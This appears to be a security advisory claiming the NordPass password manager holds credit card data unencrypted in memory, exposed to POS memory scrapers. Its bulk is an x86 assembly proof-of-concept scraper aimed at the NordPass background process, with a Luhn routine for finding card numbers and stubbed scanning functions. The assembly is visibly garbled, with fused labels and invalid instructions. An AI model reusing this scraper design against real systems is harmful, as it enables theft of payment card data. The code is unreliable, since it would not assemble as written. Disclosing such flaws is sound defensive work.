Description
The NordPass password manager is currently experiencing issues related to credit card hashing and memory protection, allowing hackers and POS malware to extract credit card data from its application. Users rely on password managers to safeguard their passwords and credit card data from hackers, especially when their computers are compromised. However, NordPass stores credit card data in plain text format in memory, making it vulnerable to compromise in case of a computer infection.
DATE(S) ISSUED: 01/06/2025
RISK: Critical
Businesses:
Large and medium: HIGH
Home Users: HIGH
Method: Remote thread execution
Download Link:
https://downloads.npass.app/windows/NordPassSetup.exe
Attackers Method:
The memory management issues in NordPass allow attackers to access NordPass’s process and search for credit card numbers stored in memory. Password apps are frequently targeted by POS malware like Fin7 POS, which use memory scrapers. These malicious programs scan memory for sensitive data, such as credit card information, often capturing it when the data is unencrypted and vulnerable. Unfortunately, the NordPass password manager is affected by this vulnerability.
This method closely resembles the widely-known point-of-sale malware called TinyPOS.
A research about Tinypos can be found here:
https://securitynews.sonicwall.com/xmlpost/tinypos-a-new-multi-component-pos-family-actively-spreading-in-the-wild/
Image of Attack:
Please check our proof of concept (POC) below:
.model flat, stdcall
option casemap:none
; Windows API imports
includelib kernel32.lib
includelib psapi.lib
extern GetSystemInfo@4
extern VirtualQueryEx@16
extern ReadProcessMemory@20
extern EnumProcesses@8
extern EnumProcessModules@16
extern GetModuleBaseNameA@12
extern OpenProcess@8
extern CloseHandle@4
.data
targetProcessName db “Nordpass-background-app.exe”, 0 ; Nordpass target process name
errorMessage db “Error encountered!”, 0
validCardMessage db “Valid Luhn card number found: “, 0
processName db “Unknown”, 0
buffer db 4096 dup(0) ; Memory buffer for reading process memory
.code
; Function: isLuhnValid
; Arguments: ECX = Address of card number string (16 digits)
; Returns: EAX = 1 if valid, 0 if not
isLuhnValid:
xor eax, eax ; Initialize totalSum = 0
xor edx, edx ; Initialize oddSum = 0
mov esi, 16 ; len = 16
lea ebx, [ecx] ; EBX points to the start of the card number string
process_digits:
mov al, [ebx] ; Load the current character
cmp al, ‘0’ ; Check if it’s less than ‘0’
jl invalid_digit
cmp al, ‘9’ ; Check if it’s greater than ‘9’
jg invalid_digit
sub al, '0' ; Convert character to digit
test esi, 1 ; Check if index is odd
jnz odd_positioneven_position:
add al, al ; Double the digit
cmp al, 9
jg subtract_9
add eax, al ; Add doubled value to totalSum
jmp next_digit
subtract_9:
sub al, 9
add eax, al
jmp next_digit
odd_position:
add edx, al ; Add to oddSum
next_digit:
inc ebx
dec esi
jnz process_digits ; Continue until all 16 digits are processed
add eax, edx ; Add oddSum to totalSum
xor edx, edx ; Clear edx for division
div byte 10 ; Divide totalSum by 10
cmp edx, 0 ; Check if remainder is 0
je valid_card ; If remainder is 0, valid card
xor eax, eax ; Invalid card, return 0
retvalid_card:
mov eax, 1 ; Valid card, return 1
ret
invalid_digit:
xor eax, eax ; Invalid input, return 0
ret
; Function: scanProcessMemoryForCardNumbers
; Arguments:
; EAX = hProcess
; EBX = target process name
scanProcessMemoryForCardNumbers:
; Simplified for illustration purposes, not interacting with the full memory API
; Normally, you’d interact with the Windows APIs here like VirtualQueryEx, ReadProcessMemory, etc.
ret
; Function: ListProcessesAndCheckMemory
ListProcessesAndCheckMemory:
; Call EnumProcesses to get a list of process IDs
; Iterate through the process IDs and check each process
; If a process name matches the target process, call scanProcessMemoryForCardNumbers
ret
; Main Entry Point
_start:
; Example target process name
lea ebx, targetProcessName ; Load target process name into EBX
call ListProcessesAndCheckMemory
; Exit the program (exit code 0)
invoke ExitProcess, 0end _start
Summary:
The developer has already advised regarding this issue.
Questions ?
info@venaksecurity.com
Leave a Reply